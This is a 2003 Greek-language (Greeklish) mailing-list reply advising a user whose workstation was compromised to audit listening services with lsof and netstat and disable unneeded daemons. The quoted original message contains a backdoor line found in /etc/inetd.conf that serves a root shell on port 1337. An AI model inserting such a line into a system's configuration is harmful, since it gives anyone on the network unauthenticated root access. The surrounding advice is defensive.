linux security book
Alexandros Papadopoulos
apapadop at cmu.edu
Mon Aug 18 06:23:58 EEST 2003
On Sunday 17 August 2003 17:18, Antonis Faragitakis wrote:
> xerete
> xrisimopoio to linux box mou san workstation opote den iparxei logos
> gia kapoiou eidous security on it. etsi pisteva mexri tin proigoumeni
> ebdomada pou eida mia periergi grammi sto /etc/inetd.conf:
> # End of inetd.conf.
> 1337 stream tcp nowait root /bin/sh sh -i
<snip>
Firewall gia workstation einai eksairetika eykolo na ftiakseis (enas kanonas
xreiazetai olos ki olos). Ayto ofeiletai sto gegonos oti to firewall gia
workstations einai praktika axrhsto - to mono pou mporei na kanei einai na
prostatepsei ton idio ton xrhsth apo thn dikh tou agnoia. Alla an o xrhsths
einai kai o administrator tou mhxanhmatos, den sou kerdizei tipota.
OPOTE: H protash mou einai na koitakseis ligo tis entoles
# lsof -i
# netstat -anp
...kai na katalabeis ti sou lene. Kata pasa pi8anothta thn epa8es epeidh
etrexes servers sto mhxanhma sou pou den xreiazesai. Workstation den einai?
Ti to 8es to inetd? Ti ton 8es ton Apache? Ti ton 8es ton portmapper? (ktl
ktl ktl). Mono otan kaneis lsof -i kai den blepeis kammia grammh pou
teleiwnei se
*:<noumero portas H eidos service> (LISTEN)
eisai asfalhs.
Oso gia documentation sxetika, o Kos Iatrou mou exei sfyriksei oti 8a yparxei
analogo ar8ro sto epomeno magaz :-)
Koita to output tou lsof kai ta periexomena tou /etc/rcX.d/ (opou X to
runlevel sou) kai 8a eisai mia xara.
-A
--
http://andrew.cmu.edu/~apapadop/pub_key.asc
3DAD 8435 DB52 F17B 640F D78C 8260 0CC1 0B75 8265
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: signature
URL: <http://lists.hellug.gr/pipermail/linux-greek-users/attachments/20030817/4d0b5c96/attachment.pgp>
More information about the Linux-greek-users
mailing list